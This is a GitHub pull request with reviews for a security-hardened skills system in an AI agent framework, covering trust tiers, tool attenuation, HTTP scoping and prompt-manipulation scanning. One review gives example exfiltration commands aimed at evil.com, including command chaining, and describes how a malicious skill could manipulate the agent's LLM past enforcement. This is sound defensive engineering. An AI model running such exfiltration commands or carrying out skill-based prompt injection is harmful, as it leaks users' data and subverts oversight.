feat: Secure prompt-based skills system (Phases 1-4) by zmanian · Pull Request #51 · nearai/ironclaw

zmanian · 2026-02-12T16:46:21Z

Summary

Complete implementation of the secure prompt-based skills system from issue #38, now including in-app skill management tools and ClawHub catalog integration.

Phase 1: OpenClaw SKILL.md format + 2-state trust

Replaced the previous multi-phase skills system with the simpler OpenClaw SKILL.md format:

SKILL.md files: YAML frontmatter (name, description, activation keywords/patterns/tags, gating requirements) + markdown prompt body
2-state trust model: Trusted (user-placed, full tool access) vs Installed (external, read-only tools only)
Authority attenuation: Tools above trust ceiling removed from LLM tool list entirely -- the LLM cannot call tools it doesn't know exist
Structural isolation: Skill content wrapped in escaped <skill name="..." trust="..."> XML tags
Deterministic selection: Keyword/pattern/tag scoring with configurable max_active_skills and max_context_tokens budgets

Phase 2: In-app skill management + ClawHub catalog

4 chat-callable tools for managing skills through conversation, plus matching web gateway endpoints:

Tool	Description	Approval
`skill_list`	List loaded skills with trust/source/keywords	No
`skill_search`	Search ClawHub catalog + local skills	No
`skill_install`	Install from content, URL, or catalog name	Yes
`skill_remove`	Remove user-installed skills	Yes

ClawHub integration: The catalog queries https://clawhub.ai/api/v1/search at runtime (configurable via CLAWHUB_REGISTRY env var) with in-memory caching (5-min TTL). No compile-time bundled entries.

Web gateway endpoints:

GET /api/skills -- List all loaded skills
POST /api/skills/search -- Search catalog + installed
POST /api/skills/install -- Install from content/URL/catalog
DELETE /api/skills/{name} -- Remove a skill

Concurrency: SkillRegistry wrapped in Arc<std::sync::RwLock> for runtime mutation from tools while allowing concurrent reads from the agent loop's select_active_skills().

Key security properties

Authority attenuation: Minimum trust of any active skill determines tool ceiling
Read-only safe: skill_list and skill_search in READ_ONLY_TOOLS so Installed-trust skills can still discover skills
Install requires approval: skill_install and skill_remove gated behind tool approval
Installed trust for external skills: Skills installed via tools get Installed trust (read-only tools only)
Protected tool names: All 4 skill tools in PROTECTED_TOOL_NAMES to prevent shadowing

Files changed

New files (2):

src/skills/catalog.rs -- Runtime ClawHub catalog with search, caching, download URL construction
src/tools/builtin/skill_tools.rs -- 4 skill management tools following extension_tools pattern

Modified (13):

src/skills/registry.rs -- Mutation methods (install, remove, reload, find_by_name) + new error variants
src/skills/mod.rs -- Export catalog module
src/skills/attenuation.rs -- skill_list/skill_search in READ_ONLY_TOOLS
src/tools/builtin/mod.rs -- Export skill_tools
src/tools/registry.rs -- register_skill_tools() + protected names
src/agent/agent_loop.rs -- Arc<RwLock> for concurrent access
src/main.rs -- Wire skill tools and catalog into agent + gateway
src/channels/web/mod.rs -- Skill registry/catalog builder methods
src/channels/web/server.rs -- 4 new skill API routes + handlers
src/channels/web/types.rs -- Skill request/response DTOs
src/channels/web/ws.rs -- Updated test GatewayState
tests/openai_compat_integration.rs -- Updated test GatewayState
tests/ws_gateway_integration.rs -- Updated test GatewayState

Test plan

Generated with Claude Code

Implement a skills system that extends the agent with prompt-level instructions from local directories. Skills declare activation criteria, tool permissions, and trust tiers that determine authority attenuation. Core security model: the minimum trust level of any active skill determines a tool ceiling -- tools above the ceiling are removed from the LLM's tool list entirely at the API level, preventing prompt-based manipulation. New modules: - skills/mod.rs: Core types (SkillTrust, SkillManifest, LoadedSkill) - skills/scanner.rs: Content scanner for manipulation detection - skills/registry.rs: Filesystem discovery and manifest parsing - skills/selector.rs: Deterministic two-phase prefilter (no LLM) - skills/attenuation.rs: Trust-based tool filtering Integration: - Agent loop selects skills per-turn and applies tool attenuation - Reasoning engine injects skill context with structural isolation - Config supports SKILLS_ENABLED, SKILLS_DIR, SKILLS_MAX_ACTIVE, SKILLS_MAX_CONTEXT_TOKENS environment variables - Disabled by default (SKILLS_ENABLED=false) 41 new tests covering all modules. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Security fixes: - Escape skill name/version in XML attributes to prevent trust spoofing - Escape prompt content to prevent </skill> tag breakout - Require integrity hash for Verified/Community tier skills - Validate skill names against [a-zA-Z0-9][a-zA-Z0-9._-]{0,63} - Add 64 KiB file size limit on prompt.md Bug fixes: - Use actual SkillsConfig from AgentDeps instead of SkillsConfig::default() - Add skills_config field to AgentDeps, wired through from main.rs Performance: - Pre-compile regex patterns at load time (cached on LoadedSkill) - Selector uses pre-compiled patterns instead of recompiling per message - Switch all std::fs to tokio::fs for non-blocking async I/O Hardening: - Cap keyword score at 30 points to prevent keyword stuffing attacks - Enforce max 20 keywords and 5 patterns per skill - Normalize line endings (CRLF/CR to LF) before hashing - Also includes cargo fmt formatting fixes for adjacent code Tests: 54 skills tests pass (up from 41), zero new clippy warnings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Fixes all 18 medium/low severity findings identified by the security review: - mod.rs: Add MAX_TAGS_PER_SKILL cap (10) in enforce_limits(); use RegexBuilder with 64 KiB size_limit to prevent ReDoS; replace case-enumerated escape_skill_content with regex matching all case variants plus whitespace/null byte injection between </ and skill; document allowed_patterns as unenforced until Phase 2; document Marketplace URL validation as Phase 3 concern - registry.rs: Add MAX_MANIFEST_FILE_SIZE (16 KiB) check before reading; add symlink detection via symlink_metadata to reject symlinks in discover_local; add MAX_DISCOVERED_SKILLS (100) cap; validate prompt_hash format (sha256: + 64 hex chars); warn on name collision before overwriting; accept SkillSource parameter in load_skill instead of always using Local; add InvalidHashFormat, ManifestTooLarge, SymlinkDetected error variants - selector.rs: Add MAX_TAG_SCORE (15) cap parallel to keyword cap; warn when declared max_context_tokens diverges >2x from actual prompt size - scanner.rs: Add mixed-script homoglyph detection (Cyrillic, Greek, Armenian unicode ranges); document token-boundary bypass and semantic paraphrasing as known limitations - attenuation.rs: Document READ_ONLY_TOOLS maintenance requirements - agent_loop.rs: Surface scan warnings via structured tracing; add structured audit events for skill activation and tool attenuation 61 tests pass, 0 new clippy warnings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

HIGH: - Escape opening <skill tags in prompt content (prevents fake skill block injection) - Scan manifest metadata fields (description, author, tags, reasons) not just prompt - Block trust downgrade on name collision (existing Local can't be replaced by Community) MEDIUM: - Eliminate TOCTOU gap: read files then check size instead of metadata-then-read - Reject file-level symlinks in load_skill (prompt.md, skill.toml) - Truncate and filter manifest.skill.tags (prevent unlimited tag scoring) - Cap regex pattern score at 40 (prevent 5x20=100 dominating keyword+tag) - Add doc comment about skill_list tool exposing metadata (sanitization required) - Move Community disclaimer inside <skill> tags (not outside structural boundary) - Filter keywords/tags shorter than 3 chars (prevent broad matching) LOW: - Enforce minimum token_cost of 1 (max_context_tokens=0 can't bypass budget) - Remove redundant try_exists checks in discover_local (let load_skill handle errors) 70 skills tests passing. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Skills that declare an [http] section in skill.toml now have their HTTP requests constrained to declared endpoints at runtime. This addresses the gap where allowed_patterns was parsed but never enforced -- once the http tool was visible via attenuation, the LLM could reach any URL. Enforcement reuses EndpointPattern/AllowlistValidator from the WASM capability system. Semantics: if no active skill declares [http], all requests pass through (backward compat). If any skill declares [http], URLs must match at least one skill's allowlist (union). Community skills' [http] declarations are silently ignored (defense in depth). Shell commands using curl/wget are also validated against scopes. Scanner gains detection for known exfiltration domains (webhook.site, ngrok.io, etc.), overly broad wildcards, and credential/host mismatches. Closes nearai#38 Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Merge main to pick up PR nearai#17 (DM pairing + Telegram channel improvements) before shipping skills system PR. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Activates enforcement of `allowed_patterns` in skill.toml permissions. Previously these patterns were parsed but not enforced -- a Verified skill declaring `permissions.shell` with `allowed_patterns = [{command = "cargo *"}]` could still run any shell command. Now the enforcer validates tool parameters against declared glob patterns before execution. Key changes: - New `enforcer.rs` module with `SkillPermissionEnforcer`, `glob_to_regex()`, and `validate_tool_call()` with union semantics across active skills - Typed pattern enums (`ShellPattern`, `FilePathPattern`, `MemoryTargetPattern`) replace the previous `Vec<serde_json::Value>` in `ToolPermissionDeclaration` - Scanner gains `scan_permission_patterns()` detecting dangerous patterns (rm, sudo, curl, bare wildcards, command chaining, sensitive paths, identity files) - Registry blocks non-Local skills with critical permission pattern warnings - Agent loop threads enforcer into `execute_chat_tool` alongside HTTP scoping Trust interaction: Community patterns ignored, Verified enforced, Local without patterns unrestricted, Local with patterns enforced as guidance. Union semantics across skills -- tool call allowed if ANY skill's patterns permit it. 34 new tests. All 818 library tests pass. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

…Phase 3+4) Phase 3 - Worker-side permission enforcement: - Add SerializedToolPermission/SerializedPattern DTOs for HTTP boundary crossing - Extend JobDescription, ContainerHandle, and orchestrator API to carry permissions - CreateJobTool snapshots and forwards skill permissions to spawned workers - Worker runtime builds SkillPermissionEnforcer and checks before tool execution - Load-time token budget enforcement rejects prompts exceeding 2x declared budget - Deduplicate enforcer construction: from_active_skills() delegates to from_serialized() Phase 4 - LLM behavioral analysis: - BehavioralAnalyzer with cached, LLM-based semantic content analysis - Structured output parsing (FINDING|CATEGORY|SEVERITY|DESCRIPTION or CLEAN) - Content-hash caching with bounded size (MAX_CACHE_ENTRIES=256) - Graceful degradation when LLM unavailable - Integrated into load_skill() for non-Local skills; critical findings block loading Review fixes: - Real cache tests with CountingLlm mock (test_cache_hit, test_cache_miss, test_cache_bounded) - UTF-8-safe truncate() in worker runtime - Few-shot examples in behavioral analysis prompt - Documented max_context_tokens=0 opt-out and create_job() permission gap 848 tests passing, no new clippy warnings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

gemini-code-assist · 2026-02-12T17:02:25Z

Summary of Changes

Hello @zmanian, I'm Gemini Code Assist¹! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request introduces a robust, multi-layered secure prompt-based skills system designed to enhance the agent's capabilities while mitigating various security risks. It integrates skill management, dynamic tool access control based on trust levels, and advanced behavioral analysis to ensure that skills operate within defined safety boundaries, protecting against prompt injection and unauthorized actions.

Highlights

Secure Prompt-Based Skills System: Implemented a comprehensive secure prompt-based skills system across four phases, including skill registry, scanner, selector, trust-based tool attenuation, HTTP endpoint scoping, parameter-level permission enforcement, worker-side enforcement, and LLM behavioral analysis.
Authority Attenuation: Tools above a skill's trust ceiling are entirely removed from the LLM's available tool list, preventing manipulation at the API level.
Defense in Depth: Community skill patterns are silently ignored at multiple enforcement points, and structural isolation for prompt injection surfaces is implemented using XML tags with escaping.
Parameter-Level Permission Enforcement: Introduced SkillPermissionEnforcer to validate tool parameters (e.g., shell commands, file paths, memory targets) against declared patterns, with union semantics across active skills.
LLM Behavioral Analysis: Added a semantic content scanner for non-local skills to detect paraphrased manipulation attempts like authority escalation, data exfiltration, and role redefinition.
Worker-Side Enforcement: Serializable permission DTOs are passed to Docker containers, ensuring skill permissions are enforced before every tool call within the worker environment.
Backward Compatibility: Ensured backward compatibility for worker API by using #[serde(default)] for new fields, allowing older orchestrators to interact without issues.

Changelog

Cargo.lock
- Added 'toml' dependency.
Cargo.toml
- Added 'toml' dependency for skill manifest parsing.
build.rs
- Refactored conditional compilation blocks for clarity and consistency.
examples/test_heartbeat.rs
- Reformatted error handling for Config::from_env.
src/agent/agent_loop.rs
- Updated AgentDeps to include skill_registry, skills_config, and job_skill_permissions.
- Added a skill_registry getter method.
- Implemented logic for selecting active skills based on message content and configured limits.
- Integrated SkillHttpScopes and SkillPermissionEnforcer for runtime validation of tool calls.
- Updated job_skill_permissions to propagate current session's skill context to spawned workers.
- Constructed skill context blocks with structural isolation and trust labels for the LLM.
- Applied trust-based tool attenuation to filter tool definitions before sending to the LLM.
- Modified execute_chat_tool to accept and apply skill_http_scopes and skill_permission_enforcer.
src/channels/wasm/router.rs
- Reordered mod tests declaration for consistent formatting.
src/channels/wasm/wrapper.rs
- Reordered use statements for consistent formatting.
- Updated ChannelStoreData::new calls in tests to include a PairingStore argument.
src/cli/config.rs
- Reformatted error handling for Config::from_env.
src/cli/pairing.rs
- Reformatted serde_json::to_string_pretty and filter_map calls for improved readability.
- Reformatted error message for No pending pairing request found.
src/config.rs
- Added SkillsConfig struct for skill system configuration.
- Implemented Default and resolve for SkillsConfig to manage skill-related settings.
- Integrated SkillsConfig into the main Config struct.
src/lib.rs
- Reordered pairing module import.
- Added skills module import.
src/llm/reasoning.rs
- Added skill_context and active_skill_trust fields to Reasoning struct.
- Implemented with_skill_context and with_skill_trust methods to inject skill information into reasoning.
- Modified build_planning_prompt to include active skill context in the system prompt.
- Updated respond method to apply trust-based tool attenuation based on active_skill_trust.
src/main.rs
- Reordered pairing::PairingStore import.
- Reformatted error handling for Config::from_env.
- Modified tools.register_job_tools to capture the job_skill_permissions_handle.
- Initialized SkillRegistry and BehavioralAnalyzer based on skills.enabled config.
- Passed skill_registry, skills_config, and job_skill_permissions_handle to AgentDeps.
src/orchestrator/api.rs
- Added skill_permissions field to JobResponse to expose worker skill context.
src/orchestrator/job_manager.rs
- Added skill_permissions field to ContainerHandle to store skill context for workers.
- Introduced create_job_with_permissions to allow creating jobs with specific skill permissions.
- Updated create_job to delegate to create_job_with_permissions with empty permissions for backward compatibility.
src/pairing/store.rs
- Reformatted serde_json::from_str calls for PairingStoreFile, UpsertResult, ApproveAttemptsFile, and AllowFromStoreFile for improved readability.
- Reformatted is_sender_allowed logic for clarity.
src/secrets/keychain.rs
- Reformatted map_err calls for SecretService and collection for improved readability.
src/skills/attenuation.rs
- Added new file: Implemented trust-based tool filtering (authority attenuation) based on skill trust tiers.
src/skills/behavioral_analyzer.rs
- Added new file: Implemented LLM-based behavioral analysis for skill prompt content to detect manipulation attempts.
src/skills/enforcer.rs
- Added new file: Implemented parameter-level permission enforcement for skill tool calls using glob patterns and regex.
src/skills/http_scoping.rs
- Added new file: Implemented HTTP endpoint scoping for skills, constraining requests to declared endpoints and managing credentials.
src/skills/mod.rs
- Added new file: Defined core skill structures, trust tiers, activation criteria, tool patterns, and utility functions for XML escaping and line ending normalization.
src/skills/registry.rs
- Added new file: Implemented skill discovery, loading, and management, including manifest parsing, integrity checks, and security scanning.
src/skills/scanner.rs
- Added new file: Implemented a content scanner for skill prompts and manifests to detect various manipulation attempts and suspicious patterns.
src/skills/selector.rs
- Added new file: Implemented a deterministic skill prefilter for two-phase selection, scoring skills based on keywords, tags, and regex patterns.
src/tools/builtin/job.rs
- Added skill_permissions field to CreateJobTool to hold current session's skill context.
- Implemented skill_permissions_handle to allow external updates to skill permissions.
- Modified create_job_inner to snapshot and pass current skill permissions to the ContainerJobManager.
src/tools/registry.rs
- Modified register_job_tools to return the job_skill_permissions_handle for agent loop integration.
src/worker/api.rs
- Added skill_permissions field to JobDescription with #[serde(default)] for backward compatibility, enabling worker-side enforcement.
src/worker/runtime.rs
- Added permission_enforcer field to WorkerRuntime.
- Initialized permission_enforcer from the job.skill_permissions received from the orchestrator.
- Integrated permission_enforcer to validate tool calls before execution within the worker.
- Improved truncate function to handle UTF-8 character boundaries correctly.
tests/pairing_integration.rs
- Reordered use statements.
- Reformatted upsert_request and is_sender_allowed calls in tests for improved readability.
tests/wasm_channel_integration.rs
- Reordered use statements.

Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature	Command	Description
Code Review	`/gemini review`	Performs a code review for the current pull request in its current state.
Pull Request Summary	`/gemini summary`	Provides a summary of the current pull request in its current state.
Comment	@gemini-code-assist	Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help	`/gemini help`	Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution. ↩

gemini-code-assist

Code Review

This is an extensive and well-executed implementation of the secure prompt-based skills system. The multi-layered approach to security, including trust-based attenuation, parameter-level enforcement, and behavioral analysis, is impressive and demonstrates a strong focus on safety and robustness. The code is well-structured, with clear separation of concerns across the new skills modules. The addition of comprehensive tests for each component is also commendable. I have a couple of minor suggestions for improving code clarity and conciseness, but overall, this is an excellent contribution.

gemini-code-assist · 2026-02-12T17:10:26Z

+        let active_skills: Vec<crate::skills::LoadedSkill> =
+            if let Some(registry) = self.skill_registry() {
+                let available = registry.available().await;
+                if !available.is_empty() {
+                    let skills_cfg = &self.deps.skills_config;
+                    let selected = crate::skills::prefilter_skills(
+                        &message.content,
+                        &available,
+                        skills_cfg.max_active_skills,
+                        skills_cfg.max_context_tokens,
+                    );
+
+                    if !selected.is_empty() {
+                        tracing::debug!(
+                            "Selected {} skill(s) for message: {}",
+                            selected.len(),
+                            selected
+                                .iter()
+                                .map(|s| s.name())
+                                .collect::<Vec<_>>()
+                                .join(", ")
+                        );
+                    }
+
+                    selected.into_iter().cloned().collect()
+                } else {
+                    vec![]
+                }
+            } else {
+                vec![]
+            };


The logic for selecting active skills can be simplified. The prefilter_skills function already handles cases where available_skills is empty, so the if !available.is_empty() check is redundant. You can make this block more concise.

let active_skills: Vec<crate::skills::LoadedSkill> = if let Some(registry) = self.skill_registry() { let available = registry.available().await; let skills_cfg = &self.deps.skills_config; let selected = crate::skills::prefilter_skills( &message.content, &available, skills_cfg.max_active_skills, skills_cfg.max_context_tokens, ); if !selected.is_empty() { tracing::debug!( "Selected {} skill(s) for message: {}", selected.len(), selected .iter() .map(|s| s.name()) .collect::<Vec<_>>() .join(", ") ); } selected.into_iter().cloned().collect() } else { vec![] };

Good catch. This was simplified on the current head; the redundant available.is_empty() gate is no longer in this block.

gemini-code-assist · 2026-02-12T17:10:26Z

+        let effective_tools = if self.active_skill_trust.is_some() {
+            // We already did attenuation in the agent loop and stored the
+            // result in the context. The attenuation is performed there so
+            // we can log the result. The context.available_tools already
+            // contains the filtered set. This branch just logs for clarity.
+            tracing::debug!(
+                "Skills active (min trust: {:?}), {} tools available after attenuation",
+                self.active_skill_trust,
+                context.available_tools.len()
+            );
+            context.available_tools.clone()
+        } else {
+            context.available_tools.clone()
+        };


The logic for determining effective_tools can be simplified for clarity. The comment indicates that attenuation is already performed in the agent loop, and this block is mainly for logging. The if/else structure is a bit redundant since both branches do context.available_tools.clone(). You can move the logging into its own if block and unconditionally clone the tools.

if self.active_skill_trust.is_some() { // We already did attenuation in the agent loop and stored the // result in the context. The attenuation is performed there so // we can log the result. The context.available_tools already // contains the filtered set. This branch just logs for clarity. tracing::debug!( "Skills active (min trust: {:?}), {} tools available after attenuation", self.active_skill_trust, context.available_tools.len() ); } let effective_tools = context.available_tools.clone();

Agreed. This is now flattened to a logging-only if followed by an unconditional context.available_tools.clone() for clarity.

serrrfirat

PR #51 Review: feat: Secure prompt-based skills system (Phases 1-4)

Author: zmanian | Reviewer: clawd (automated) | Date: 2026-02-12

Summary

Massive PR (~8000 lines) adding a complete prompt-based skills system to IronClaw with a well-designed trust model (Local/Verified/Community), authority attenuation, permission enforcement, HTTP scoping, content scanning, behavioral analysis, and worker propagation. This is impressive security engineering.

Verdict: REQUEST_CHANGES

P0 — Critical Security Issues

1. User-approved tool calls bypass ALL enforcement (agent_loop.rs ~L1868)

When a user explicitly approves a pending tool call, execute_chat_tool is called with None for both http_scopes and permission_enforcer:

// User explicitly approved this tool call, so skip HTTP scoping
// and permission enforcement
let tool_result = self.execute_chat_tool(&pending.tool_name, &pending.parameters, &job_ctx, None, None).await;

Risk: A Community skill could manipulate the LLM into requesting a dangerous tool call. If the user approves it (users often rubber-stamp approvals), all enforcement is bypassed. The comment says "user explicitly approved" but the approval UX may not clearly show the skill context.
Fix: Still enforce HTTP scoping and permissions even for approved calls, or at minimum show the user which skill triggered the request and what enforcement would have blocked.

2. Shell HTTP scoping is trivially bypassable (http_scoping.rs)

extract_url_from_shell only detects curl and wget prefixed commands. Trivial bypasses:

python -c "import urllib; urllib.request.urlopen('https://evil.com')"
node -e "fetch('https://evil.com')"
curl aliased or invoked via full path /usr/bin/curl
Pipe chains: echo https://evil.com | xargs curl

Risk: Any skill with shell access can exfiltrate data despite HTTP scoping.
Fix: Document this as a known limitation in the module doc, or extend detection. The real defense is attenuation (Community skills don't get shell), but Verified skills with declared shell access could abuse this.

3. Glob pattern `is_valid_pattern_char` allows space but not `|`, `&`, `;` — but doesn't prevent command injection in shell patterns (enforcer.rs)

A Verified skill can declare allowed_patterns = [{command = "cargo build"}] but the glob match is against the entire command string. An attacker-controlled LLM could call:

cargo build && curl evil.com

This would NOT match cargo build (exact match) but WOULD match cargo * pattern since * matches [^/]* which includes &&.
Risk: The * wildcard matches command chaining operators within a single path segment.
Fix: Either disallow * from matching &, |, ; characters in shell context, or document that shell patterns should use exact commands and use the scanner warnings as defense.

P1 — Correctness Bugs

4. `truncate_cmd` in http_scoping.rs can panic on multi-byte UTF-8

fn truncate_cmd(s: &str, max: usize) -> &str {
    if s.len() <= max { s } else { &s[..max] }
}

Unlike the truncate_value in enforcer.rs (which properly handles char boundaries), this will panic if max falls in the middle of a multi-byte character.
Fix: Use the same char-boundary-aware truncation as in enforcer.rs.

5. Behavioral analyzer cache eviction is random (behavioral_analyzer.rs ~L108)

if let Some(key) = cache.keys().next().cloned() {
    cache.remove(&key);
}

HashMap iteration order is arbitrary — this evicts a random entry rather than LRU. For a cache of 256 entries this is likely fine in practice, but could lead to re-analyzing recently-used skills while keeping stale entries.
Fix: Consider using an LRU cache or accept this as a known limitation with a comment.

6. Redundant tool attenuation code path in reasoning.rs

The effective_tools branch in respond() does nothing — it clones context.available_tools regardless:

let effective_tools = if self.active_skill_trust.is_some() {
    tracing::debug!(...);
    context.available_tools.clone()
} else {
    context.available_tools.clone()
};

The actual attenuation happens in agent_loop.rs. This dead branch adds confusion.
Fix: Remove the branch and just use context.available_tools.clone() directly, with a comment pointing to where attenuation actually occurs.

P2 — Design Concerns

7. Mixed trust drops to lowest — may be too aggressive

If a user has a Local skill and installs one Community skill, ALL tools get restricted to read-only. This could be very surprising UX.
Recommendation: Consider per-skill attenuation rather than global minimum trust, or at minimum warn the user loudly when a Community skill downgrades their entire tool ceiling.

8. Keyword scoring can be gamed by choosing common words

A skill with keywords ["help", "the", "please"] (all >= 3 chars, pass the filter) would match virtually every user message.
Recommendation: Consider TF-IDF or stopword filtering for keywords.

9. No rate limiting on behavioral analyzer LLM calls

Every new non-Local skill triggers an LLM call. A directory with 100 Community skills = 100 LLM calls at startup.
Recommendation: Add a concurrent analysis limit or batch processing.

P3 — Nits / Style

Lots of formatting-only changes (rustfmt) mixed in with the feature changes, making the diff harder to review. Consider separating formatting PRs.
skill_list in READ_ONLY_TOOLS has a maintenance note about sanitization — ensure the skill_list tool implementation exists and handles this.
The SkillTrust enum ordering (Community=0, Verified=1, Local=2) is correct for min() semantics but the Ord derive goes by discriminant value which happens to work — add a comment to prevent accidental reordering.

Strengths

Defense in depth: Multiple layers (scanner, behavioral analyzer, attenuation, permission enforcement, HTTP scoping) means no single bypass breaks everything.
Excellent test coverage: ~1500 lines of well-structured tests covering edge cases, trust boundaries, and round-trip serialization.
Clean separation of concerns: Each module (attenuation, enforcer, http_scoping, scanner, selector, registry) has clear responsibilities.
Worker propagation: Skill permissions frozen at job creation and enforced in workers — nice design.
Content escaping: XML attribute injection prevention and <skill> tag breakout prevention are thoughtful.

- Fix truncate_cmd UTF-8 panic: use char-boundary-aware slicing - Remove redundant effective_tools branching in reasoning.rs - Document cache eviction as known limitation (arbitrary, not LRU) - Add safety comment on SkillTrust enum ordering (security-critical) - Simplify active_skills selection (prefilter_skills handles empty input) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Take main's security hardening, shared util::floor_char_boundary, and improved error handling over branch-local implementations. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

tribendu · 2026-02-15T00:57:23Z

Summary

This PR implements a comprehensive secure prompt-based skills system with trust-based authority attenuation and multiple defense layers. The implementation demonstrates strong security engineering with defense-in-depth, proper bounds checking, and extensive test coverage. The core security model (trust tiers, tool ceilings, and enforcement) is sound.

Pros

Well-designed trust model: Three-tier system (Community < Verified < Local) with proper enforcement
Defense in depth: Multiple layers - scanner, behavioral analysis, attenuation, parameter enforcement
Proper bounds checking: File size limits, regex size limits (64KiB), keyword/pattern caps
Strong escaping: XML attribute and content escaping prevent tag injection
Path traversal protection: Symlink rejection prevents directory traversal
Integrity verification: SHA-256 hashes for non-Local skills
Excellent test coverage: 400+ test lines covering security-critical paths
Transparent logging: Structured logging events for audit trail
Graceful degradation: Behavioral analyzer falls back safely when LLM unavailable
Pre-compilation: Regex patterns compiled at load time to avoid DoS

Concerns

Behavioral analyzer LLM failure is too permissive: When the LLM call fails, it allows any skill to load with just a warning. An attacker who can disrupt LLM availability could bypass this layer. Consider adding fallback to scanner-only blocking for critical trust tiers.
Arbitrary cache eviction not LRU: BehavioralAnalyzer.remove_first() removes arbitrary entries rather than least-recently-used, which could lead to cache churn. While not critical, an LRU would be more efficient.
Pattern validation in enforcer: Invalid patterns (with special characters like ;) are skipped with warnings rather than blocking the entire skill. This is reasonable for robustness, but for Verified/Community skills, consider being stricter.
Unicode encoding complexity in skill tags: escape_xml_attr() doesn't handle numeric character references (<). While unlikely in practice, skill author names could theoretically exploit this. The XML escaping is generally solid.
Parameter validation incomplete: The enforcer uses params.get("command").and_then(|v| v.as_str()) which uses unwrap_or("") on missing parameters. Consider adding explicit type checking with as_str() instead.
Shell command detection patterns: SHELL_HTTP_COMMANDS only catches curl and wget with space/tab. Could miss variants like curl\x20. The regex for HTTP request detection is broader.
Cache poisoning consideration: If an attacker can cause hash collisions, they could poison the cache. SHA-256 collision resistance makes this theoretical, but worth documenting.
Mixed trust skill combinations: When mixing Local (unrestricted) with Verified (restricted) skills, the unrestricted Local can "unlock" tools that Verified skills can't access. This is by design (union semantics), but could be surprising. The trust ceiling enforcement still applies.

Suggestions

Consider blocking critical-tier findings from scanner even for Local skills, with a force flag
Add property-based tests for XML escaping covering all Unicode categories
Document the LLM fallback behavior clearly for operators
Consider adding rate limiting or circuit breaking to the behavioral analyzer
Add integration tests for concurrent skill loading scenarios
Consider adding #[must_use] attributes to validation methods that return Result
The max_context_tokens enforcement (rejecting at load time if > 2x budget) is good - consider making this configurable or adding a warning-only mode for development

zmanian · 2026-02-15T15:44:01Z

Thanks for the thorough review, @serrrfirat and @tribendu. This was very useful.

Status on the key points:

truncate_cmd UTF-8 boundary panic: fixed on the current head (truncate_cmd now truncates on char boundaries).
User-approved execution bypassing scoping/enforcement: currently intentional as an explicit user override, but I agree auditability should be stronger. I’ll add clearer warning/audit output showing when scoped enforcement is bypassed.
Shell HTTP scoping bypasses: agreed. This layer is best-effort and not a hard isolation boundary; I’ll make that limitation more prominent in docs.
Shell wildcard pattern/operator hardening (* + command chaining chars): good catch; I’ll tighten shell-pattern semantics so wildcard matching cannot silently permit chaining operators.
Behavioral analyzer cache eviction policy: accepted; switching to LRU is a reasonable follow-up.
Redundant effective_tools/active_skill_trust plumbing in reasoning: agreed; I’ll clean this up in this PR.

P2/P3 feedback (mixed-trust UX warning, keyword-gaming resistance, analyzer rate limits, and maintenance notes) is also acknowledged and tracked for follow-up.

I’ll push remaining fixes and post a follow-up update once they land.

zmanian · 2026-02-15T15:54:40Z

Follow-up update: I pushed remaining review fixes in 714103b.

Addressed items:

Enforced skill HTTP scoping + parameter permission enforcement even on manually approved tool calls (removed bypass path).
Removed dead reasoning trust plumbing (active_skill_trust / with_skill_trust) and kept attenuation responsibility in agent_loop.
Removed skill_list from READ_ONLY_TOOLS in attenuation (tool not present).
Hardened HTTP scoping docs/behavior:
- explicit "best-effort" shell-scoping caveat in module docs
- community-only active skills now deny HTTP by default when no enforceable non-community scopes exist
- added/updated tests for this behavior
Hardened shell permission globbing so wildcards do not match shell metacharacters used for command chaining/substitution.
Switched behavioral analyzer cache eviction from arbitrary removal to LRU.

Validation run on this branch:

cargo test -q skills::
cargo test -q agent::
cargo test -q llm::

All passed.

# Conflicts: # Cargo.lock # src/agent/agent_loop.rs # src/config.rs # src/tools/builtin/job.rs # src/tools/registry.rs

zmanian · 2026-02-17T04:52:26Z

Heads up: #120 proposes a significant simplification that would supersede this PR. The new direction adopts the OpenClaw SKILL.md format and uses Docker confinement (PR #57) instead of the scanner, behavioral analyzer, and parameter-level enforcer built here. The work on this branch informed the new design, but the trust hierarchy and content analysis layers would be replaced by tool-level attenuation + container isolation.

